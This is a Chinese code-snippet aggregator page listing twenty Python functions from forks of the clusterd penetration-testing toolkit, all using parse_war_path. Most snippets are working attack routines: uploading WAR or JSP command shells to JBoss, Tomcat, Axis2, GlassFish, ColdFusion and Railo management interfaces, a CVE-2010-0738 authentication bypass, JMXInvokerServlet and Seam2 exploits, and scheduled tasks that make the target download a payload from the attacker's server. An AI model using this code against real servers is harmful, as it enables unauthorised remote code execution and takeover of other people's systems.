本文整理汇总了Python中src.module.deploy_utils.parse_war_path函数的典型用法代码示例。如果您正苦于以下问题:Python parse_war_path函数的具体用法?Python parse_war_path怎么用?Python parse_war_path使用的例子?那么恭喜您, 这里精选的函数代码示例或许可以为您提供帮助。
在下文中一共展示了parse_war_path函数的20个代码示例,这些例子默认根据受欢迎程度排序。您可以为喜欢或者感觉有用的代码点赞,您的评价将有助于我们的系统推荐出更棒的Python代码示例。
示例1: deploy
def deploy(fingerengine, fingerprint):
""" Upload a service via the administrative interface
"""
cookie = None
file_path = abspath(fingerengine.options.deploy)
file_name = parse_war_path(file_path, True)
dip = fingerengine.options.ip
cookie = checkAuth(dip, fingerprint.port, title, fingerprint.version)
if not cookie:
utility.Msg("Could not get auth to %s:%s" % (dip, fingerprint.port), LOG.ERROR)
return
utility.Msg("Preparing to deploy {0}".format(file_name))
base = "http://{0}:{1}".format(dip, fingerprint.port)
uri = "/axis2/axis2-admin/upload"
payload = {"filename": open(file_path, "rb")}
response = utility.requests_post(base + uri, files=payload, cookies=cookie)
if response.status_code is 200:
if "The following error occurred" in response.content:
error = findall("occurred <br/> (.*?)</font>", response.content)
utility.Msg("Failed to deploy {0}. Reason: {1}".format(file_name, error[0]), LOG.ERROR)
else:
utility.Msg(
"{0} deployed successfully to /axis2/services/{1}".format(file_name, parse_war_path(file_path)),
LOG.SUCCESS,
)
else:
utility.Msg("Failed to deploy {0} (HTTP {1})".format(file_name, response.status_code), LOG.ERROR)
开发者ID:wflk,项目名称:clusterd,代码行数:33,代码来源:service_upload.py
示例2: invoke_war
def invoke_war(fingerengine, fingerprint):
""" Invoke a deployed WAR file on the remote server.
This uses unzip because Python's zip module isn't very portable or
fault tolerant; i.e. it fails to parse msfpayload-generated WARs, though
this is a fault of metasploit, not the Python module.
"""
dfile = fingerengine.options.deploy
jsp = getoutput("unzip -l %s | grep jsp" % dfile).split(' ')[-1]
if jsp == '':
utility.Msg("Failed to find a JSP in the deployed WAR", LOG.DEBUG)
return
else:
utility.Msg("Using JSP {0} from {1} to invoke".format(jsp, dfile), LOG.DEBUG)
url = "http://{0}:{1}/{2}/{3}".format(fingerengine.options.ip,
fingerprint.port,
parse_war_path(dfile),
jsp)
if _invoke(url):
utility.Msg("{0} invoked at {1}".format(dfile, fingerengine.options.ip))
else:
utility.Msg("Failed to invoke {0}".format(parse_war_path(dfile, True)),
LOG.ERROR)
开发者ID:BwRy,项目名称:clusterd,代码行数:28,代码来源:invoke_payload.py
示例3: deploy
def deploy(fingerengine, fingerprint):
""" Upload a service via the administrative interface
"""
cookie = None
file_path = abspath(fingerengine.options.deploy)
file_name = parse_war_path(file_path, True)
dip = fingerengine.options.ip
cookie = checkAuth(dip, fingerprint.port, title, fingerprint.version)
if not cookie:
utility.Msg("Could not get auth to %s:%s" % (dip, fingerprint.port),
LOG.ERROR)
return
utility.Msg("Preparing to deploy {0}".format(file_name))
base = 'http://{0}:{1}'.format(dip, fingerprint.port)
uri = '/axis2/axis2-admin/upload'
payload = {'filename' : open(file_path, 'rb')}
response = utility.requests_post(base + uri, files=payload, cookies=cookie)
if response.status_code is 200:
utility.Msg("{0} deployed successfully to /axis2/services/{1}".
format(file_name, parse_war_path(file_path)),
LOG.SUCCESS)
else:
utility.Msg("Failed to deploy {0} (HTTP {1})".format(file_name,
response.status_code), LOG.ERROR)
开发者ID:Kolaris,项目名称:clusterd,代码行数:30,代码来源:service_upload.py
示例4: invoke_war
def invoke_war(fingerengine, fingerprint):
""" Invoke a deployed WAR or JSP file on the remote server.
This uses unzip because Python's zip module isn't very portable or
fault tolerant; i.e. it fails to parse msfpayload-generated WARs, though
this is a fault of metasploit, not the Python module.
"""
dfile = fingerengine.options.deploy
jsp = ''
if '.war' in dfile:
jsp = getoutput("unzip -l %s | grep jsp" % dfile).split(' ')[-1]
elif '.jsp' in dfile:
jsp = dfile
if jsp == '':
utility.Msg("Failed to find a JSP in the deployed WAR", LOG.DEBUG)
return
utility.Msg("Using JSP {0} from {1} to invoke".format(jsp, dfile), LOG.DEBUG)
war_path = parse_war_path(dfile)
try:
# for jboss ejb/jmx invokers, we append a random integer
# in case multiple deploys of the same name are used
if fingerengine.random_int:
war_path += fingerengine.random_int
except:
pass
url = "http://{0}:{1}/{2}/{3}"
if 'random_int' in dir(fingerengine):
# we've deployed via ejb/jmxinvokerservlet, so the path
# will be based upon a random number
url = url.format(fingerengine.options.ip,
fingerprint.port,
war_path + str(fingerengine.random_int),
jsp)
else:
url = url.format(fingerengine.options.ip,
fingerprint.port,
war_path,
jsp)
if _invoke(url):
utility.Msg("{0} invoked at {1}".format(dfile, fingerengine.options.ip))
else:
utility.Msg("Failed to invoke {0}".format(parse_war_path(dfile, True)),
LOG.ERROR)
开发者ID:carnal0wnage,项目名称:clusterd,代码行数:50,代码来源:invoke_payload.py
示例5: deploy
def deploy(fingerengine, fingerprint):
""" This deployer attempts to deploy to the JMXInvokerServlet, often
left unprotected. For versions 3.x and 4.x we can deploy WARs, but for 5.x
the HttpAdaptor invoker is broken (in JBoss), so instead we invoke
the DeploymentFileRepository method. This requires a JSP instead of a WAR.
"""
war_file = fingerengine.options.deploy
war_name = parse_war_path(war_file)
utility.Msg("Preparing to deploy {0}...".format(war_file))
url = "http://{0}:{1}/invoker/JMXInvokerServlet".format(
fingerengine.options.ip, fingerprint.port)
fingerengine.random_int = str(randint(50,300))
# the attached fingerprint doesnt have a version; lets pull one of the others
# to fetch it. dirty hack.
fp = [f for f in fingerengine.fingerprints if f.version != 'Any']
if len(fp) > 0:
fp = fp[0]
else:
ver = utility.capture_input("Could not reliably determine version, "
"please enter the remote JBoss instance"
" version")
if len(ver) > 0:
if '.' not in ver:
ver += '.0'
if ver not in versions:
utility.Msg("Failed to find a valid fingerprint for deployment.", LOG.ERROR)
return
else:
fp = fingerprint
fp.version = ver
else:
return
if '.war' in war_file:
tmp = utility.capture_input("This deployer requires a JSP, default to cmd.jsp? [Y/n]")
if 'n' in tmp.lower():
return
war_file = abspath("./src/lib/resources/cmd.jsp")
war_name = "cmd"
response = invkdeploy(fp.version, url, abspath(war_file),
fingerengine.random_int)
if len(response) > 1:
if('org.jboss.web.tomcat.security.SecurityAssociationValve' in response and 'org.apache.catalina.authenticator.AuthenticatorBase.invoke' in response):
utility.Msg('Deployment failed due to insufficient or invalid credentials.', LOG.ERROR)
else:
utility.Msg(response, LOG.DEBUG)
else:
utility.Msg("{0} deployed to {1} (/{2})".format(war_name,
fingerengine.options.ip,
war_name + fingerengine.random_int),
LOG.SUCCESS)
开发者ID:0x0mar,项目名称:clusterd,代码行数:60,代码来源:jmxinvokerservlet.py
示例6: run_task
def run_task(ip, fingerprint, cfm_path, cookie):
""" Invoke the task and wait for the server to fetch it
"""
success = False
cfm_file = parse_war_path(cfm_path, True)
# start up our listener
server_thread = Thread(target=_serve, args=(cfm_path,))
server_thread.start()
sleep(2)
base = 'http://{0}:{1}'.format(ip, fingerprint.port)
if fingerprint.version in ['5.0']:
uri = '/CFIDE/administrator/scheduler/runtask.cfm?task=%s' % cfm_file
else:
uri = '/CFIDE/administrator/scheduler/scheduletasks.cfm?runtask=%s'\
% cfm_file
response = utility.requests_get(base + uri, cookies=cookie)
if waitServe(server_thread):
if fingerprint.version in ['5.0']:
out_diag = "{0} deployed to /{0}".format(cfm_file.replace('cfml','cfm'))
else:
out_diag = "{0} deployed to /CFIDE/{0}".format(cfm_file)
utility.Msg(out_diag, LOG.SUCCESS)
success = True
killServe()
return success
开发者ID:0x0mar,项目名称:clusterd,代码行数:32,代码来源:schedule_job_old.py
示例7: deploy
def deploy(fingerengine, fingerprint):
"""
"""
cfm_path = abspath(fingerengine.options.deploy)
cfm_file = parse_war_path(cfm_path, True)
dip = fingerengine.options.ip
utility.Msg("Preparing to deploy {0}...".format(cfm_file))
utility.Msg("Fetching web root...", LOG.DEBUG)
# fetch web root; this is where we stash the file
root = fetch_webroot(dip, fingerprint)
if not root:
utility.Msg("Unable to fetch web root.", LOG.ERROR)
return
# create the scheduled task
utility.Msg("Web root found at %s" % root, LOG.DEBUG)
utility.Msg("Creating scheduled task...")
if not create_task(dip, fingerprint, cfm_file, root):
return
# invoke the task
utility.Msg("Task %s created, invoking task..." % cfm_file)
run_task(dip, fingerprint, cfm_path)
# remove the task
utility.Msg("Cleaning up...")
delete_task(dip, fingerprint, cfm_file)
开发者ID:At9o11,项目名称:clusterd,代码行数:31,代码来源:schedule_job.py
示例8: invoke
def invoke(url, payload, os, version, pl_file):
""" All we need to do is traverse up to the admin-ext-thumbnails
directory and invoke our stager
"""
utility.Msg("Invoking stager and deploying payload...")
fetchurl = "http://{0}:{1}/{2}".format(utility.local_address(),
state.external_port, pl_file)
# calculate file hash
hsh = md5("%s-5000-5000" % fetchurl).hexdigest().upper()
url = url.format(hsh)
# fire up server
server_thread = Thread(target=_serve, args=(payload,))
server_thread.start()
sleep(2)
r = utility.requests_get(url)
if waitServe(server_thread):
utility.Msg("{0} deployed at /railo-context/{0}".format(
parse_war_path(payload,True)),
LOG.SUCCESS)
else:
utility.Msg("Failed to deploy (HTTP %d)" % r.status_code, LOG.ERROR)
killServe()
开发者ID:52M,项目名称:clusterd,代码行数:27,代码来源:thumbnail_inject.py
示例9: run_task
def run_task(ip, fingerprint, cfm_path):
"""
"""
global cookie
cfm_file = parse_war_path(cfm_path, True)
# kick up server
server_thread = Thread(target=_serve, args=(cfm_path,))
server_thread.start()
sleep(2)
base = "http://{0}:{1}/railo-context/admin/web.cfm".format(ip, fingerprint.port)
params = "?action=services.schedule"
data = OrderedDict([
("row_1", "1"),
("name_1", cfm_file),
("mainAction", "execute")
])
response = utility.requests_post(base + params, data=data, cookies=cookie)
if waitServe(server_thread):
utility.Msg("{0} deployed to /{0}".format(cfm_file), LOG.SUCCESS)
killServe()
开发者ID:0x0mar,项目名称:clusterd,代码行数:25,代码来源:schedule_task.py
示例10: invoke_cf
def invoke_cf(fingerengine, fingerprint, deployer):
"""
"""
dfile = parse_war_path(fingerengine.options.deploy, True)
if fingerprint.version in ["10.0"]:
# deployments to 10 require us to trigger a 404
url = "http://{0}:{1}/CFIDE/ad123.cfm".format(fingerengine.options.ip,
fingerprint.port)
elif fingerprint.version in ["8.0"] and "fck_editor" in deployer.__name__:
# invoke a shell via FCKeditor deployer
url = "http://{0}:{1}/userfiles/file/{2}".format(fingerengine.options.ip,
fingerprint.port,
dfile)
elif 'lfi_stager' in deployer.__name__:
url = 'http://{0}:{1}/{2}'.format(fingerengine.options.ip,
fingerprint.port,
dfile)
else:
url = "http://{0}:{1}/CFIDE/{2}".format(fingerengine.options.ip,
fingerprint.port,
dfile)
if _invoke(url):
utility.Msg("{0} invoked at {1}".format(dfile, fingerengine.options.ip))
else:
utility.Msg("Failed to invoke {0}".format(dfile), LOG.ERROR)
开发者ID:0x0mar,项目名称:clusterd,代码行数:28,代码来源:invoke_payload.py
示例11: deploy
def deploy(fingerengine, fingerprint):
""" Exploits Seam2 exposed by certain JBoss installs. Here we
require the use of a JSP payload that's written into the www root. The 5.1
deployer here varies slightly from the Metasploit version, which doesn't appear to
have been tested against 5.1. JBoss 5.1 writes into a cached temp, which is regenerated
every time that war folder is modified. This kills the shell.
JBoss 6.0/6.1 is the same, however, and appears to work fine.
https://www.exploit-db.com/exploits/36653/
"""
war_file = abspath(fingerengine.options.deploy)
war_name = parse_war_path(war_file)
if '.war' in war_file:
war_file = abspath('./src/lib/resources/cmd.jsp')
war_name = 'cmd'
utility.Msg("Preparing to deploy {0}...".format(war_name))
headers = {"Content-Type":"application/x-www-form-urlencoded"}
jsp_name = ''.join(choice(ascii_lowercase) for _ in range(5)) + '.jsp'
jsp = None
try:
with open(war_file) as f:
jsp = f.read()
except Exception, e:
utility.Msg("Error reading payload file '%s': %s" % (war_file, e), LOG.ERROR)
return False
开发者ID:dbiesecke,项目名称:clusterd,代码行数:30,代码来源:seam_upload.py
示例12: invoke_axis2
def invoke_axis2(fingerengine, fingerprint, deployer):
""" Invoke an Axis2 payload
"""
cnt = 0
dfile = parse_war_path(fingerengine.options.deploy)
url = 'http://{0}:{1}/axis2/services/{2}'.format(
fingerengine.options.ip, fingerprint.port,
dfile)
if fingerprint.version not in ['1.6']:
# versions < 1.6 require an explicit invocation of run
url += '/run'
utility.Msg("Attempting to invoke...")
# axis2 takes a few seconds to get going, probe for 5s
while cnt < 5:
if _invoke(url):
utility.Msg("{0} invoked at {1}".format(dfile, fingerengine.options.ip))
return
cnt += 1
sleep(1)
utility.Msg("Failed to invoke {0}".format(dfile), LOG.ERROR)
开发者ID:carnal0wnage,项目名称:clusterd,代码行数:27,代码来源:invoke_payload.py
示例13: run_task
def run_task(ip, fingerprint, cfm_path):
""" Invoke the task and wait for the remote server to fetch
our file
"""
cfm_name = parse_war_path(cfm_path, True)
# kick up the HTTP server
server_thread = Thread(target=_serve, args=(cfm_path,))
server_thread.start()
sleep(2)
url = "http://{0}:{1}/CFIDE/administrator/scheduler/scheduletasks.cfm"\
.format(ip, fingerprint.port)
(cookie, csrf) = fetch_csrf(ip, fingerprint, url)
if fingerprint.version in ["9.0"]:
uri = "?runtask={0}&timeout=0&csrftoken={1}".format(cfm_name, csrf)
elif fingerprint.version in ["10.0"]:
uri = "?runtask={0}&group=default&mode=server&csrftoken={1}".format(cfm_name, csrf)
response = utility.requests_get(url + uri, cookies=cookie)
if waitServe(server_thread):
utility.Msg("{0} deployed to /CFIDE/{0}".format(cfm_name), LOG.SUCCESS)
try:
utility.requests_get("http://localhost:8000", timeout=1)
except:
pass
开发者ID:Cnlouds,项目名称:clusterd,代码行数:30,代码来源:schedule_job.py
示例14: deploy
def deploy(fingerengine, fingerprint):
""" Upload via the exposed REST API
"""
if fingerprint.version in ['3.1', '4.0']:
state.ssl = True
war_file = fingerengine.options.deploy
war_path = abspath(war_file)
war_name = parse_war_path(war_file)
dip = fingerengine.options.ip
headers = {
"Accept" : "application/json",
"X-Requested-By" : "requests"
}
cookie = checkAuth(dip, fingerprint.port, title)
if not cookie:
utility.Msg("Could not get auth to %s:%s" % (dip, fingerprint.port),
LOG.ERROR)
return
utility.Msg("Preparing to deploy {0}...".format(war_file))
base = 'http://{0}:{1}'.format(dip, fingerprint.port)
uri = '/management/domain/applications/application'
data = {
'id' : open(war_path, 'rb'),
'force' : 'true'
}
response = utility.requests_post(base + uri, files=data,
auth=cookie,
headers=headers)
if response.status_code is 200:
if fingerprint.version in ['3.0']:
# GF 3.0 ignores context-root and appends a random character string to
# the name. We need to fetch it, then set it as our random_int for
# invoke support. There's also no list-wars in here...
url = base + '/management/domain/applications/application'
response = utility.requests_get(url, auth=cookie, headers=headers)
if response.status_code is 200:
data = json.loads(response.content)
for entry in data[u"Child Resources"]:
if war_name in entry:
rand = entry.rsplit('/', 1)[1]
rand = rand.split(war_name)[1]
fingerengine.random_int = str(rand)
utility.Msg("Deployed {0} to :8080/{0}{1}".format(war_name, rand),
LOG.SUCCESS)
else:
utility.Msg("Deployed {0} to :8080/{0}".format(war_name), LOG.SUCCESS)
else:
utility.Msg("Failed to deploy {0} (HTTP {1})".format(war_name,
response.status_code),
LOG.ERROR)
开发者ID:0x0mar,项目名称:clusterd,代码行数:60,代码来源:admin_upload.py
示例15: run
def run(fingerengine, fingerprint):
""" This module exploits CVE-2010-0738, which bypasses authentication
by submitting requests with different HTTP verbs, such as HEAD.
"""
utility.Msg("Checking %s for verb tampering" % fingerengine.options.ip,
LOG.DEBUG)
url = "http://{0}:{1}/jmx-console/HtmlAdaptor".format(fingerengine.options.ip,
fingerprint.port)
response = utility.requests_head(url)
if response.status_code == 200:
utility.Msg("Vulnerable to verb tampering, attempting to deploy...", LOG.SUCCESS)
war_file = abspath(fingerengine.options.deploy)
war_name = parse_war_path(war_file)
tamper = "/jmx-console/HtmlAdaptor?action=invokeOp"\
"&name=jboss.admin:service=DeploymentFileRepository&methodIndex=5"\
"&arg0={0}&arg1={1}&arg2=.jsp&arg3={2}&arg4=True".format(
war_file.replace('.jsp', '.war'), war_name,
quote_plus(open(war_file).read()))
response = utility.requests_head(url + tamper)
if response.status_code == 200:
utility.Msg("Successfully deployed {0}".format(war_file), LOG.SUCCESS)
else:
utility.Msg("Failed to deploy (HTTP %d)" % response.status_code, LOG.ERROR)
开发者ID:At9o11,项目名称:clusterd,代码行数:28,代码来源:verb_tamper.py
示例16: deploy
def deploy(fingerengine, fingerprint):
""" Through Tomcat versions, remotely deploying hasnt changed much.
Newer versions have a new URL and some quarks, but it's otherwise very
stable and quite simple. Tomcat cannot be asked to pull a file, and thus
we just execute a PUT with the payload. Simple and elegant.
"""
war_file = fingerengine.options.deploy
war_path = parse_war_path(war_file)
version_path = "manager/deploy"
utility.Msg("Preparing to deploy {0}...".format(war_file))
if fingerprint.version in ["7.0", "8.0"]:
# starting with version 7.0, the remote deployment URL has changed
version_path = "manager/text/deploy"
url = "http://{0}:{1}/{2}?path=/{3}".format(fingerengine.options.ip,
fingerprint.port,
version_path,
war_path)
try:
files = open(war_file, 'rb')
except Exception, e:
utility.Msg(e, LOG.ERROR)
return
开发者ID:0x0mar,项目名称:clusterd,代码行数:27,代码来源:manage_deploy.py
示例17: manage_undeploy
def manage_undeploy(fingerengine, fingerprint):
""" This is used to undeploy from JBoss 7.x and 8.x
"""
context = fingerengine.options.undeploy
context = parse_war_path(context)
url = 'http://{0}:{1}/management'.format(fingerengine.options.ip,
fingerprint.port)
undeploy = '{{"operation":"remove", "address":{{"deployment":"{0}"}}}}'\
.format(context)
headers = {'Content-Type':"application/json"}
response = utility.requests_post(url, headers=headers, data=undeploy)
if response.status_code == 401:
utility.Msg("Host %s:%s requires auth, checking..." %
(fingerengine.options.ip, fingerprint.port), LOG.DEBUG)
cookie = checkAuth(fingerengine.options.ip, fingerprint.port,
fingerprint.title, fingerprint.version)
if cookie:
response = utility.requests_post(url, headers=headers, data=undeploy,
cookies=cookie[0], auth=cookie[1])
else:
utility.Msg("Could not get auth for %s:%s" %
(fingerengine.options.ip, fingerprint.port), LOG.ERROR)
if response.status_code == 200:
utility.Msg("{0} successfully undeployed".format(context), LOG.SUCCESS)
else:
utility.Msg("Failed to undeploy", LOG.ERROR)
开发者ID:0x0mar,项目名称:clusterd,代码行数:32,代码来源:undeployer.py
示例18: invoke_rl
def invoke_rl(fingerengine, fingerprint, deployer):
"""
"""
dfile = parse_war_path(fingerengine.options.deploy, True)
url = "http://{0}:{1}/{2}".format(fingerengine.options.ip, fingerprint.port, dfile)
if _invoke(url):
utility.Msg("{0} invoked at {1}".format(dfile, fingerengine.options.ip))
else:
utility.Msg("Failed to invoke {0}".format(dfile), LOG.ERROR)
开发者ID:wflk,项目名称:clusterd,代码行数:11,代码来源:invoke_payload.py
示例19: deploy
def deploy(fingerengine, fingerprint):
""" This deployer attempts to deploy to the JMXInvokerServlet, often
left unprotected. For versions 3.x and 4.x we can deploy WARs, but for 5.x
the HttpAdaptor invoker is broken (in JBoss), so instead we invoke
the DeploymentFileRepository method. This requires a JSP instead of a WAR.
"""
war_file = fingerengine.options.deploy
war_name = parse_war_path(war_file)
utility.Msg("Preparing to deploy {0}...".format(war_file))
url = "http://{0}:{1}/invoker/JMXInvokerServlet".format(
fingerengine.options.ip, fingerprint.port)
fingerengine.random_int = str(randint(50,300))
# the attached fingerprint doesnt have a version; lets pull one of the others
# to fetch it. dirty hack.
fp = [f for f in fingerengine.fingerprints if f.version != 'Any']
if len(fp) > 0:
fp = fp[0]
else:
ver = utility.capture_input("Could not reliably determine version, "
"please enter the remote JBoss instance"
" version")
if len(ver) > 0:
if '.' not in ver:
ver += '.0'
if ver not in versions:
utility.Msg("Failed to find a valid fingerprint for deployment.", LOG.ERROR)
return
else:
fp = fingerprint
fp.version = ver
else:
return
if '.war' in war_file:
utility.Msg("This deployer requires a JSP payload", LOG.ERROR)
return
response = invkdeploy(fp.version, url, abspath(war_file),
fingerengine.random_int)
if len(response) > 1:
utility.Msg(response, LOG.DEBUG)
else:
utility.Msg("{0} deployed to {1} (/{2})".format(war_name,
fingerengine.options.ip,
war_name + fingerengine.random_int),
LOG.SUCCESS)
开发者ID:carnal0wnage,项目名称:clusterd,代码行数:53,代码来源:jmxinvokerservlet.py
示例20: undeploy
def undeploy(fingerengine, fingerprint):
""" This module is used to undeploy a context from a remote Tomcat server.
In general, it is as simple as fetching /manager/html/undeploy?path=CONTEXT
with an authenticated GET request to perform this action.
However, Tomcat 6.x proves to not be as nice. The undeployer in 6.x requires
a refreshed session ID and a CSRF token. This requires one more request on
our part.
Tomcat 7.x and 8.x expose /manager/text/undeploy which can bypass
the need for a CSRF token.
"""
context = parse_war_path(fingerengine.options.undeploy)
base = "http://{0}:{1}".format(fingerengine.options.ip, fingerprint.port)
cookies = checkAuth(fingerengine.options.ip, fingerprint.port,
fingerprint.title, fingerprint.version)
if not cookies:
utility.Msg("Could not get auth for %s:%s" %
(fingerengine.options.ip, fingerprint.port), LOG.ERROR)
return
if fingerprint.version in ["7.0", "8.0"]:
uri = "/manager/text/undeploy?path=/{0}".format(context)
elif fingerprint.version in ['4.0', '4.1']:
uri = '/manager/html/remove?path=/{0}'.format(context)
else:
uri = "/manager/html/undeploy?path=/{0}".format(context)
if fingerprint.version in ['6.0']:
(csrf, c) = fetchCSRF(base, cookies)
uri += '&org.apache.catalina.filters.CSRF_NONCE=%s' % csrf
# rebuild our auth tuple
cookies = (c, cookies[1])
url = base + uri
utility.Msg("Preparing to undeploy {0}...".format(context))
response = utility.requests_get(url, cookies=cookies[0],
auth=cookies[1])
if response.status_code == 200 and \
('Undeployed application at context' in response.content or\
'OK' in response.content):
utility.Msg("Successfully undeployed %s" % context, LOG.SUCCESS)
elif 'No context exists for path' in response.content:
utility.Msg("Could not find a context for %s" % context, LOG.ERROR)
else:
utility.Msg("Failed to undeploy (HTTP %s)" % response.status_code, LOG.ERROR)
开发者ID:0x0mar,项目名称:clusterd,代码行数:51,代码来源:undeployer.py
注:本文中的src.module.deploy_utils.parse_war_path函数示例由纯净天空整理自Github/MSDocs等源码及文档管理平台,相关代码片段筛选自各路编程大神贡献的开源项目,源码版权归原作者所有,传播和使用请参考对应项目的License;未经允许,请勿转载。 |
请发表评论